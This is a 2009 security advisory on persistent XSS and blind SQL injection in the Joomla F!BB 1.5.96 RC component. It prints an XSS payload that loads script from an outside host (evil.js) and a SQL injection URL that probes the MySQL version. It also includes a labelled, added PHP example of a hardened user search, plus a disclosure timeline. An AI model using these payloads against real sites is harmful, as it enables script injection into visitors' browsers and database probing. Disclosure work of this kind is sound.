Thursday, 17 September 2009 00:00
The Joomla component F!BB 1.5.96 RC suffers from multiple persistent XSS vulnerabilities, as well as SQL injection in its user search feature.
ICQ, MSN Profile Fields XSS
The MSN field will be rendered in the page twice.
AIM Profile Field XSS
This field accepts only a limited number of characters, but the following will inject script:
"><script src=//jeffchannell.com/evil.js></script
NOTE: Skype, Gtalk, website fields are also vulnerable, though the window for injection is even smaller!
Blind SQL Injection
REQUIRES: magic_quotes_gpc OFF
index.php?option=com_fbb&func=advsearch&q=&exactname=1&childforums=1&limitstart=0&searchuser=%' AND SUBSTRING(@@version,1,1)=5 -- '
If MySQL is version 5, this will return results. Otherwise, no results.
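
A hardened form of the user search described above, as an added example that is not F!BB's or the author's code: the search term is bound as a parameter and LIKE wildcards are escaped, so the query no longer depends on magic_quotes_gpc. The users table, the function names and the in-memory SQLite database (PHP with pdo_sqlite) are assumptions for illustration.

```php
<?php
// Added example, not F!BB code. Table, column and function names are
// hypothetical; an in-memory SQLite database stands in for MySQL.

// Escape LIKE metacharacters so user input cannot act as a wildcard.
function escape_like(string $term, string $esc = '!'): string
{
    return str_replace([$esc, '%', '_'], [$esc . $esc, $esc . '%', $esc . '_'], $term);
}

// Search users by name. The term is always bound, never concatenated, so the
// query text is fixed no matter what arrives in the searchuser parameter.
function search_users(PDO $db, string $searchuser, bool $exactname): array
{
    if ($exactname) {
        $stmt = $db->prepare('SELECT username FROM users WHERE username = :q ORDER BY username');
        $stmt->execute([':q' => $searchuser]);
    } else {
        $stmt = $db->prepare("SELECT username FROM users WHERE username LIKE :q ESCAPE '!' ORDER BY username");
        $stmt->execute([':q' => '%' . escape_like($searchuser) . '%']);
    }
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (username TEXT)');
$db->exec("INSERT INTO users VALUES ('alice'), ('bob'), ('100%_real')");

// Constructed inputs: the searchuser value quoted in the advisory, then benign terms.
$payload = "%' AND SUBSTRING(@@version,1,1)=5 -- '";

// Bound as data, the advisory's value is only an unusual name to look for.
var_dump(search_users($db, $payload, true));
var_dump(search_users($db, $payload, false));

// An ordinary substring search still works.
var_dump(search_users($db, 'ali', false));

// A literal percent sign matches only names that contain one.
var_dump(search_users($db, '%', false));
```
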
- Vulnerabilities Discovered: 31 July 2009
- Vendor Notified: 31 July 2009
- Vendor Response: 31 July 2009
- Update Available: ... 2009
- Disclosure: 17 September 2009
Last Updated on Thursday, 30 September 2010 17:38
The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.